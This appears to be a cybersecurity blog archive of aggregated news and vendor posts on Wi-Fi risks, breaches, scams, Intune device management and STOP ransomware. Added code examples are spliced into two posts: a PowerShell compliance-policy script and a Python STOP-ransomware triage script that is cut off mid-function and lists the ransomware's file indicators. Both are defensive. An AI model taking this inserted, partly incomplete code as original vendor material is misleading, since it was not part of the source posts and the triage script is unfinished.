Category Archives: Cybersecurity

The Risks of Public Wi-Fi and How to Close the Security Gap

As I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPN

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that accesses online sites on your behalf, giving you a secure connection almost anywhere you go. A VPN also hides your IP address and lets you browse anonymously from any location.

How VPNs work

To use a VPN, you subscribe to a VPN service, download the app onto your desktop or phone, set up your account, and then log on to a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disable your Wi-Fi from the network when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

The Details of Roughly 620 Million Users Are Up for Sale on The Dark Web

Approximately 620 million records stolen from sixteen compromised websites are up for grabs on the Dark Web. According to The Register, the list includes users of the following companies: Dubsmash, MyFitnessPal, MyHeritage, ShareThis, HauteLook, Animoto, EyeEm, 8fit, Whitepages, Fotolog, 500px, Armor Games, BookMate, CoffeeMeetsBagel, Artsy, and DataCamp.

While some of the affected companies such as MyHeritage and MyFitnessPal have already announced that they were hacked last year, the list consists predominantly of newcomers who have just begun notifying their users about the breach. Some of the newcomers include 500px, DataCamp, EyeEm, and 8fit.

The massive database of stolen information is being offered on the Dream Market cyber-souk located in the Tor network for roughly $20,000 in Bitcoin, and according to The Register’s source, the database has been purchased at least once already. However, it is currently unknown how many cybercriminals have bought the list so far.

The database contains personal information such as full names, email addresses, passwords, and other data such as location and social media authentication tokens. It is currently unknown if the list contains sensitive information such as SSN, DOB, and credit card details. It is assumed that most of the leaks included in the database come from data breaches that have happened over the last two years.

A MyHeritage spokesperson who was provided with a sample of the list confirmed that the information in it is legitimate and was illegally obtained from the organization a couple of years ago. EyeEm and 500px have already begun notifying affected customers and forcing them to change their passwords. The majority of the affected companies are still not actively forcing affected users to change their passwords.

This major collection of multiple data breaches is not to be confused with the 2.2 billion record monster data collection that started circulating on the Dark Web and various torrent websites a couple of weeks ago. It is currently unknown if the stolen data is part of that 2.2 billion record collection. It is also unknown if the details from the stolen data have been uploaded to Have I Been Pwned.

What should you do?

Hackers will most likely start using the stolen data to get access to other websites where the same login details have been reused. Such leaks make life much easier for hackers, as they can use simple techniques such as credential reuse to get access to even more sensitive information about their targets.

The very first thing you should do is start practicing good password hygiene by changing your passwords regularly – it often takes years for a company to disclose that it has been breached. Changing your password at least once every three months is indeed a good practice.

Don’t be tempted to reuse passwords on different websites. If you struggle to remember all your passwords, it is worth using antivirus software – the best antivirus software solutions not only protect you from hackers but also come with useful features such as password managers.


The post The Details of Roughly 620 Million Users Are Up for Sale on The Dark Web appeared first on Panda Security Mediacenter.

Three reasons employee monitoring software is making a comeback

Companies are increasingly implementing employee and user activity monitoring software to:

  • Ensure data privacy
  • Protect intellectual property and sensitive data from falling into the wrong hands
  • Stop malicious or unintentional data exfiltration attempts
  • Find ways to optimize processes and improve employee productivity

Modern user activity monitoring software is incredibly flexible, providing companies with the insights they need while offering the protection they demand. By examining three prominent use cases, it’s evident that employee monitoring software … More

The post Three reasons employee monitoring software is making a comeback appeared first on Help Net Security.

Machine learning fundamentals: What cybersecurity professionals need to know

In this Help Net Security podcast, Chris Morales, Head of Security Analytics at Vectra, talks about machine learning fundamentals, and illustrates what cybersecurity professionals should know. Here’s a transcript of the podcast for your convenience. Hi, this is Chris Morales and I’m Head of Security Analytics at Vectra, and in this Help Net Security podcast I want to talk about machine learning fundamentals that I think we all need to know as cybersecurity professionals. AI … More

The post Machine learning fundamentals: What cybersecurity professionals need to know appeared first on Help Net Security.

Increased appetite for biometrics fueled by speed, security and convenience

The Biometric Consumer Sentiment Survey of more than 1,000 U.S. adults who have experience using biometrics to log into their accounts, reveals an increased appetite for the technology. 70 percent of respondents reported that they would like to expand the use of biometric authentication into the workplace, according to Veridium. Consumers cited speed (35 percent), security (31 percent) and not having to remember passwords (33 percent) as the primary reasons for liking biometric authentication. “The … More

The post Increased appetite for biometrics fueled by speed, security and convenience appeared first on Help Net Security.

SaaS spending increasing by 78 percent year-over-year

43% of the average company’s SaaS application stack changed in the last two years, according to the 2019 Annual SaaS Trends report. This is far greater than the typical employee churn rate. Meanwhile, spending has not slowed down – the average SaaS spend per company increased 78 percent year-over-year across organizations in Blissfully’s dataset. This rapid pace of technology change shows that organizations are willing to go to great lengths to increase their teams’ productivity … More

The post SaaS spending increasing by 78 percent year-over-year appeared first on Help Net Security.

How organizations handle disruptive data sources

In the 2018 Data Connectivity Survey by Progress, more than 1,400 business and IT professionals in various roles across industries and geographies shared their insights on the latest trends within the rapidly changing enterprise data market. The findings revealed five data-related areas of primary importance for organizations as they migrate to the cloud: data integration, real-time hybrid connectivity, data security, standards-based technology and open analytics. Significant findings from the survey include: Data integration has become … More

The post How organizations handle disruptive data sources appeared first on Help Net Security.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams that use clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime, delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email asking you to review a product to get rewards. If you click on the link, it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

Step 5. Set up mobile device management: top 10 actions to secure your environment

The Top 10 actions to secure your environment series outlines fundamental steps you can take with your investment in Microsoft 365 security solutions. In Step 5. Set up mobile device management, you’ll learn how to plan your Microsoft Intune deployment and set up Mobile Device Management (MDM) as part of your unified endpoint management (UEM) strategy.

In Steps 1-4 of the series, we provided tips for securing identities with Azure Active Directory (Azure AD). In the next two posts (Step 5 and Step 6), we introduce you to ContosoCars to illustrate how you can deploy Microsoft Intune as part of your UEM strategy for securing company data on devices and applications.

ContosoCars is an automotive company with 1,000 employees that work in the corporate headquarters, and 4,000 that work in several branches across the U.S. Another 2,000 service centers are owned by franchises. To stay competitive, IT needs to support a fleet of cloud-connected devices for secure, remote access to Office 365 and SaaS apps and sensitive customer data. With their expanding business, franchise sales staff need access to ContosoCars customer data as well, but ContosoCars does not own those devices.

They have defined the following goals:

  • Deliver the best Windows 10 experience for all their corporate PCs.
  • Allow employees to use personal devices and mobile phones at work.
  • Protect the network from unknown or compromised users and devices.
  • Secure data on tablet devices shared by several shop floor workers that are often left in public areas of the shop.
  • Prevent employees from accessing and maintaining corporate data if they leave the company.

Plan your Intune deployment

Once ContosoCars defines their goals, they can begin to set up use-case scenarios to align their goals with user types and user groups (Figure 1). ContosoCars wants to provide corporate devices for their employees at headquarters and branches. They will not supply devices to their franchise sales staff, but they need to make sure staff-owned tablets can use Office 365 apps to securely access company data.

Graph showing ContosoCars locations, device ownership, groups, platforms, and requirements. All part of their use-case management plan.

Figure 1. ContosoCars’ defined Intune use-case scenarios and requirements.

You can find more information on setting goals, use-case scenarios, and requirements in the Intune deployment planning, design, and implementation guide. The guide also includes recommendations for a design plan that integrates well with existing systems, a communication plan that takes into account the different channels your audience uses to receive information, a rollout plan, and a support plan.

Set up Mobile Device Management (MDM)

Once planning is complete, ContosoCars can move on to implementing their Intune plan. ContosoCars uses Azure AD to fully leverage Office 365 cloud services and get the benefits of identity-driven security (see Step 1. Identify users). Before employees can enroll their devices to be managed by Intune, IT admins will need to set the MDM authority to Intune in the Azure portal.

In order to manage the devices, ContosoCars can add and deploy configuration policies to enable and disable settings and features such as software delivery, endpoint protection, identity protection, and email. ContosoCars can also use configuration policies to deploy Windows Defender Advanced Threat Protection (ATP), which provides instant detection and blocking of advanced threats. Once IT admins set up Intune, users can enroll devices by signing in with their work or school account to automatically receive the right configuration profiles for their device.

ContosoCars can configure devices to meet business requirements and enable security features, such as Windows Hello, which allows users to sign in to their computer using a combination of biometrics and a PIN.

Manage personal devices

Next on the rollout plan are the personal iPhones and Android phones used by the staff to keep up with work email and data. ContosoCars will manage these devices by requiring employees to enroll their devices with Intune, following the enrollment requirements guidance, before allowing access to work apps, company data, or email. ContosoCars can set up configuration policies for these devices just as they did for the Windows 10 PCs, and they can add additional security controls by setting up device compliance policies. Using Azure AD you can allow or block users in real time if their compliance state changes. These policies ensure only known and healthy devices enter the network.

Some examples include:

  • Require users to set a password to access devices; password must be of certain complexity.
  • Require users to set a PIN to encrypt the device; PIN must be of certain complexity.
  • Deny access to jail-broken or rooted devices, as they may have unknown apps installed.
  • Require a minimum OS version to ensure security patch level is met.
  • Require the device to be at, or under, the acceptable device-risk level.

With Windows 10, conditional access policies are integrated with Windows Defender ATP. Microsoft works with leading mobile threat defense technology partners to provide comprehensive device-risk assessment on all platforms.
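As an added example that is not part of the original post or Microsoft's own documentation, the compliance rules listed above can be expressed as an Intune iOS device compliance policy created through the Microsoft Graph API with the Microsoft Graph PowerShell SDK. The policy name, minimum OS version, risk level and group name are assumed placeholder values; the permission scope and Graph endpoints are the real ones.

```powershell
# Added example (not from the original post): create and assign an Intune iOS
# compliance policy that encodes the ContosoCars rules above, via the Microsoft
# Graph PowerShell SDK (Microsoft.Graph.Authentication module). Assumptions:
# the signed-in admin is granted DeviceManagementConfiguration.ReadWrite.All,
# and the display name, OS version, risk level and group name are placeholders.
Connect-MgGraph -Scopes "DeviceManagementConfiguration.ReadWrite.All"

$policy = @{
    "@odata.type" = "#microsoft.graph.iosCompliancePolicy"
    displayName   = "ContosoCars - iOS baseline (example)"
    description   = "Passcode, jailbreak, OS version and device-risk requirements"

    # Require a passcode of a certain complexity (the password/PIN items above).
    passcodeRequired                      = $true
    passcodeRequiredType                  = "alphanumeric"
    passcodeMinimumLength                 = 6
    passcodeBlockSimple                   = $true
    passcodeMinutesOfInactivityBeforeLock = 5

    # Deny jailbroken devices (the androidCompliancePolicy type uses the same
    # property to deny rooted devices).
    securityBlockJailbrokenDevices = $true

    # Require a minimum OS version so the security patch level is met.
    osMinimumVersion = "12.1"   # placeholder value

    # Require the device to be at or under the acceptable risk level, as
    # reported by the integrated mobile threat defense partner.
    deviceThreatProtectionEnabled               = $true
    deviceThreatProtectionRequiredSecurityLevel = "medium"   # placeholder

    # Graph requires at least one scheduled action; mark non-compliant devices
    # immediately (no grace period) so Conditional Access can block them.
    scheduledActionsForRule = @(
        @{
            ruleName = "PasswordRequired"
            scheduledActionConfigurations = @(
                @{
                    actionType             = "block"
                    gracePeriodHours       = 0
                    notificationTemplateId = ""
                }
            )
        }
    )
}

$created = Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/v1.0/deviceManagement/deviceCompliancePolicies" `
    -Body ($policy | ConvertTo-Json -Depth 10) -ContentType "application/json"

# Assign the policy to the group of personal-device users (placeholder group name).
$lookup = Invoke-MgGraphRequest -Method GET `
    -Uri "https://graph.microsoft.com/v1.0/groups?`$filter=displayName eq 'ContosoCars-BYOD-Users'"
if (-not $lookup.value) { throw "Target group not found; create it or adjust the name." }
$groupId = $lookup.value[0].id

$assignment = @{
    assignments = @(
        @{
            target = @{
                "@odata.type" = "#microsoft.graph.groupAssignmentTarget"
                groupId       = $groupId
            }
        }
    )
}
Invoke-MgGraphRequest -Method POST `
    -Uri "https://graph.microsoft.com/v1.0/deviceManagement/deviceCompliancePolicies/$($created.id)/assign" `
    -Body ($assignment | ConvertTo-Json -Depth 10) -ContentType "application/json"
```

The policy only evaluates compliance; the real-time allow/block described above still needs an Azure AD Conditional Access policy that requires the device to be marked compliant.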

Learn more

Check back in a few weeks for our next blog post, Step 6. Manage mobile apps, where we explore the use of Intune app protection policies to allow only approved applications to access work email and data. We will also learn how ContosoCars keeps sensitive customer data secure on shared franchise devices on the shop floor.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.


The post Step 5. Set up mobile device management: top 10 actions to secure your environment appeared first on Microsoft Secure.

Most companies anticipate a critical breach in 2019, CISOs need to prioritize threats

80 percent of IT business leaders anticipate a critical breach or successful cyberattack over the coming year, according to the Cyber Risk Index (CRI), a Trend Micro survey of more than 1,000 IT security professionals in the United States. The CRI survey was conducted to measure business risk based on the difference between organizations’ current security posture and their likelihood of attack, with the goal of helping CISOs and their teams better assess, protect, detect, … More

The post Most companies anticipate a critical breach in 2019, CISOs need to prioritize threats appeared first on Help Net Security.

Most wanted malware in January 2019: A new threat speaks up

Check Point’s Global Threat Index for January 2019 reveals a new backdoor Trojan affecting Linux servers, which is distributing the XMRig crypto-miner. The new malware, dubbed SpeakUp, is capable of delivering any payload and executing it on compromised machines. The new Trojan currently evades all security vendors’ anti-virus software. It has been propagated through a series of exploitations based on commands it receives from its control center, including the 8th most popular exploited vulnerability, “Command … More

The post Most wanted malware in January 2019: A new threat speaks up appeared first on Help Net Security.

NIST Cybersecurity Framework: Five years later

Five years after the release of the Framework for Improving Critical Infrastructure Cybersecurity, organizations across all sectors of the economy are creatively deploying this voluntary approach to better management of cybersecurity-related risks. The U.S. Department of Commerce’s National Institute of Standards and Technology (NIST) issued what is now widely known simply as the “NIST Cybersecurity Framework” on February 12, 2014. Its development was the result of a year-long collaborative process involving hundreds of organizations and … More

The post NIST Cybersecurity Framework: Five years later appeared first on Help Net Security.

The evolution of Microsoft Threat Protection, February update

February is an exciting month of enhancements for Microsoft Threat Protection. For those who have followed our monthly updates (November, December, and January), you’re aware that Microsoft Threat Protection helps provide users optimal security from the moment they sign in, use email, work on documents, or utilize cloud applications. IT administrators benefit from minimal complexity while staying ahead of threats to their organization. Microsoft Threat Protection is one of the few available services helping provide comprehensive security across multiple attack vectors. This month, we share enhancements to identity protection, the launch of the Microsoft 365 security center, and another example of Microsoft Threat Protection mitigating a real-world attack.

Enhancing identity protection

Currently, 81 percent of all cyberattacks are due to weak or compromised credentials. Weak identity protection exposes all other attack surfaces to cyberthreats. With this in mind, Microsoft has invested heavily in identity protection, ensuring it continues as one of our fundamental strengths and differentiators. Microsoft Threat Protection leverages Azure Active Directory (Azure AD) Identity Protection to provide comprehensive, industry-leading identity protection for hundreds of millions of users. This month, we’re excited to announce enhancements to our identity protection capabilities with the following updates to Azure AD Identity Protection:

  • An intuitive and integrated UX for Azure AD Identity Protection, including security insights, recommendations, sign-ins report integration, and the ability to filter, sort, and perform bulk operations (Figure 1).
  • Powerful APIs that allow you to integrate all levels of risk data with ticketing or SIEM systems.
  • Improved risk assessment based on continuously tuning our heuristic and machine learning systems to bring you even more accurate risk analysis to drive your prevention and remediation strategy.
  • Service-wide alignment across risky users and risky sign-ins.

Screenshot of the new Azure AD Identity Protection Security Overview dashboard.

Figure 1. The new Azure AD Identity Protection Security – Overview dashboard.

Each of these updates is based on customer feedback and our deep domain expertise. With these updates, we continue to improve and build on securing identities for thousands of customers. In fact, several customers such as The Walsh Group, Abtis, Identity Experts, and BDO Netherlands have already experienced the benefits of these new enhancements. We hope you try the refreshed Azure AD Identity Protection. Get the full details of these updates in our blog post, and please share your thoughts via the in-product prompts.

Reducing complexity with the Microsoft 365 security center

Microsoft Threat Protection is built on the Microsoft Intelligent Security Graph, which provides a deep and broad threat signal and leverages machine learning for intelligent signal correlation. Many of our customers have often asked us to provide a “single pane of glass” that provides a centralized experience across their Microsoft security services and helps correlate signals from disparate sources, to provide richer insights that lead to intelligent security decisions.

To address this critical customer ask, we recently launched the Microsoft 365 security center (Figure 2), which surfaces many of these correlated signals in a detailed and elegant user interface, helping reduce the complexity of an organization’s security environment. The new Microsoft 365 security center (which can be accessed at security.microsoft.com) provides security administrators (SecAdmins) a centralized hub and specialized workspace to manage and take full advantage of most Microsoft Threat Protection services. Admins will gain the visibility, control, and guidance necessary to understand and act on the threats currently impacting their organization, as well as information on past and future threats.

Screenshot of the new Microsoft 365 security center.

Figure 2. The new Microsoft 365 security center (security.microsoft.com).

The Microsoft 365 security center also provides experiences for security operators (SecOps) through the integration of incident response capabilities such as a centralized alert view and powerful hunting capabilities enabling ad-hoc investigations. We’ll be making continuous enhancements to the Microsoft 365 security center and providing updates on its progress.

Microsoft Threat Protection secures think tanks, non-profits, and the public sector from unidentified attackers

While our updates on new features and enhancements hopefully convey our focus and investment in providing best-in-class security, Microsoft Threat Protection’s ability to stop real-world threats is ultimately the truest test. Recently, Microsoft Threat Protection helped secure several public sector institutions and non-governmental organizations such as think tanks, research centers, and educational institutions, as well as private-sector corporations in the oil and gas, chemical, and hospitality industries, from a very aggressive cyberattack. Some third-party security researchers have attributed the attack to CozyBear, though Microsoft does not believe there is yet enough evidence to attribute the attack to CozyBear. Figure 3 shows the full attack chain.

Graph of the attack chain of a recent threat to public sector and other non-government agencies by unidentified attacker.

Figure 3. Attack chain of recent threat to public sector and other non-government agencies by unidentified attacker.

Customers using the complete Microsoft Threat Protection solution were secured from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection detected and blocked emails with malicious URLs, including samples which had never been seen before. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection (ATP) exposed the attacker techniques across the attack chain.

Due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the added step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats. Learn about the full analysis in our recent blog.

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection, read our previous monthly updates, and visit Integrated and automated security. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities.

Begin trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

The post The evolution of Microsoft Threat Protection, February update appeared first on Microsoft Secure.

Cyberinsurance and Acts of War

I had not heard about this case before. Zurich Insurance has refused to pay Mondelez International's claim of $100 million in damages from NotPetya. It claims it is an act of war and therefore not covered. Mondelez is suing.

Those turning to cyber insurance to manage their exposure presently face significant uncertainties about its promise. First, the scope of cyber risks vastly exceeds available coverage, as cyber perils cut across most areas of commercial insurance in an unprecedented manner: direct losses to policyholders and third-party claims (clients, customers, etc.); financial, physical and IP damages; business interruption, and so on. Yet no cyber insurance policies cover this entire spectrum. Second, the scope of cyber-risk coverage under existing policies, whether traditional general liability or property policies or cyber-specific policies, is rarely comprehensive (to cover all possible cyber perils) and often unclear (i.e., it does not explicitly pertain to all manifestations of cyber perils, or it explicitly excludes some).

But it is in the public interest for Zurich and its peers to expand their role in managing cyber risk. In its ideal state, a mature cyber insurance market could go beyond simply absorbing some of the damage of cyberattacks and play a more fundamental role in engineering and managing cyber risk. It would allow analysis of data across industries to understand risk factors and develop common metrics and scalable solutions. It would allow researchers to pinpoint sources of aggregation risk, such as weak spots in widely relied-upon software and hardware platforms and services. Through its financial levers, the insurance industry can turn these insights into action, shaping private-sector behavior and promoting best practices internationally. Such systematic efforts to improve and incentivize cyber-risk management would redress the conditions that made NotPetya possible in the first place. This, in turn, would diminish the onus on governments to retaliate against attacks.

SMBs spending a day each week dealing with cybersecurity issues

Almost half of UK small to medium-sized businesses (SMBs) believe a cyberattack would put their business at risk of closure, and 48 per cent of businesses report they have had to deprioritise activities that would help grow their business to address cybersecurity, new research from Webroot reveals. The report, titled “Size Does Matter,” details the challenging climate for UK SMBs in a time of rapid political, economic and social change. Second only to Brexit, … More

The post SMBs spending a day each week dealing with cybersecurity issues appeared first on Help Net Security.

Healthcare email fraud: Attack attempts jump 473% over two years

Proofpoint found that healthcare organisations were targeted in 96 email fraud attacks on average in Q4 2018 – a 473 percent jump from Q1 2017. More than half of these organisations (53 percent) were attacked more often, with incidents up between 200 and 600 percent during the two-year period. Researchers analysed more than 160 billion emails sent across 150 countries in both 2017 and 2018 to identify email fraud attack trends targeting more than 450 … More

The post Healthcare email fraud: Attack attempts jump 473% over two years appeared first on Help Net Security.

Nearly two-thirds of organizations say tech skills gap is impacting IT audits

Technologies such as AI are reshaping the future of IT auditors, but auditors are largely optimistic about the future, according to new research from ISACA. In the Future of IT Audit, the results of a survey of more than 2,400 IT auditors worldwide, 92 percent of IT auditors responded that they are optimistic about how technology will impact them professionally over the next five years. Nearly 8 in 10 say their IT audit team has … More

The post Nearly two-thirds of organizations say tech skills gap is impacting IT audits appeared first on Help Net Security.

Impersonation, sender forgery and corporate email spoofing top the charts

This Q4 of 2018 was a busy period for phishing scammers. INKY researchers saw a spike in email volume this time of year as people use email to gather their receipts from online shopping, shipping notifications, returns, and virtual holiday greetings. For its 2018 Q4 email security report, the company pulled out the highest volume attack types and broke down each one. The majority of attacks that were analyzed showed an increase in target personalization, … More

The post Impersonation, sender forgery and corporate email spoofing top the charts appeared first on Help Net Security.

STOP ransomware claims even more victims

Despite having been ‘in the wild’ for some weeks now, infections caused by STOP ransomware have continued to rise. Perhaps somewhat ironically, those most affected (at the moment) appear to be software pirates.

Security analysts have discovered the STOP executable is being bundled with adware installers, commonly found on websites hosting warez and software licensing cracks. As well as downloading illegal software, users may also be downloading – and installing – malware on their computer.

Much worse than adware

Although they exhibit virus-like behaviours, adware is usually more of an annoyance. But once compromised by STOP, the annoyance becomes a serious problem.

Once installed, STOP quickly encrypts all of the user’s documents, changing the filename to .djvu, .tro or .rumba. Once encrypted, the file is completely inaccessible. The malware also creates a text file (called _openme.txt) in each affected folder, explaining that the machine is infected and the user cannot access their data until they pay a ransom of $980. If the user pays within 72 hours of infection, the cost is reduced to $490.

The text file also contains a ‘personal ID’ which the hackers claim is used to generate the decryption key needed to restore access to affected files. Without decryption, the user cannot access any of their files or photos.
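A triage routine for a machine showing the behaviour just described, as an added Python example that is not Panda Security's code: it walks a file tree, finds every _openme.txt note, pulls out the personal ID, and lists files carrying the .djvu, .tro or .rumba extension with their probable original names. The directory tree, the file contents and the wording of the note are constructed for the example; it also assumes the ransomware appends its extension to the original filename.

```python
"""Triage of a file tree after a STOP infection: locate ransom notes, pull the
'personal ID' out of each, and list encrypted files with their probable original
names. Added example; the directory tree and note text are constructed."""
import re
import tempfile
from pathlib import Path

STOP_EXTENSIONS = {".djvu", ".tro", ".rumba"}   # extensions named in the post
RANSOM_NOTE = "_openme.txt"                     # note filename named in the post
# The note wording is constructed for this example; the regex only assumes the
# note carries a line reading 'Personal ID: <token>'.
ID_PATTERN = re.compile(r"personal id:\s*([A-Za-z0-9-]+)", re.IGNORECASE)


def triage_tree(root) -> dict:
    """Walk `root` and return notes per folder, encrypted files with their
    probable original names, the distinct IDs seen, and folders that hold
    encrypted files but no note. Assumes the extension is appended to the
    original filename, so stripping the last suffix recovers that name."""
    root = Path(root)
    notes, encrypted, touched = {}, [], set()
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        folder = rel.parent.as_posix()
        if path.name == RANSOM_NOTE:
            match = ID_PATTERN.search(path.read_text(errors="replace"))
            notes[folder] = match.group(1) if match else None
        elif path.suffix.lower() in STOP_EXTENSIONS:
            # 'report.docx.djvu' -> original name 'report.docx'
            encrypted.append((rel.as_posix(), path.stem))
            touched.add(folder)
    return {
        "notes": notes,
        "encrypted": encrypted,
        "ids": sorted({i for i in notes.values() if i}),
        # The post says a note is dropped in each affected folder, so a folder
        # with encrypted files and no note deserves a second look.
        "unnoted_folders": sorted(touched - set(notes)),
    }


def build_sample_tree(base) -> Path:
    """Create a constructed victim-like tree under `base` for offline testing."""
    base = Path(base)
    note = "ATTENTION!\nYour files are encrypted.\nPersonal ID: CONSTRUCTED-ID-0001\n"
    files = {
        "Documents/report.docx.djvu": b"\x00opaque",
        "Documents/_openme.txt": note.encode(),
        "Pictures/holiday.jpg.rumba": b"\x00opaque",
        "Pictures/_openme.txt": note.encode(),
        "Downloads/setup.exe.tro": b"\x00opaque",   # encrypted, but no note here
        "Untouched/todo.txt": b"not encrypted",
    }
    for rel, data in files.items():
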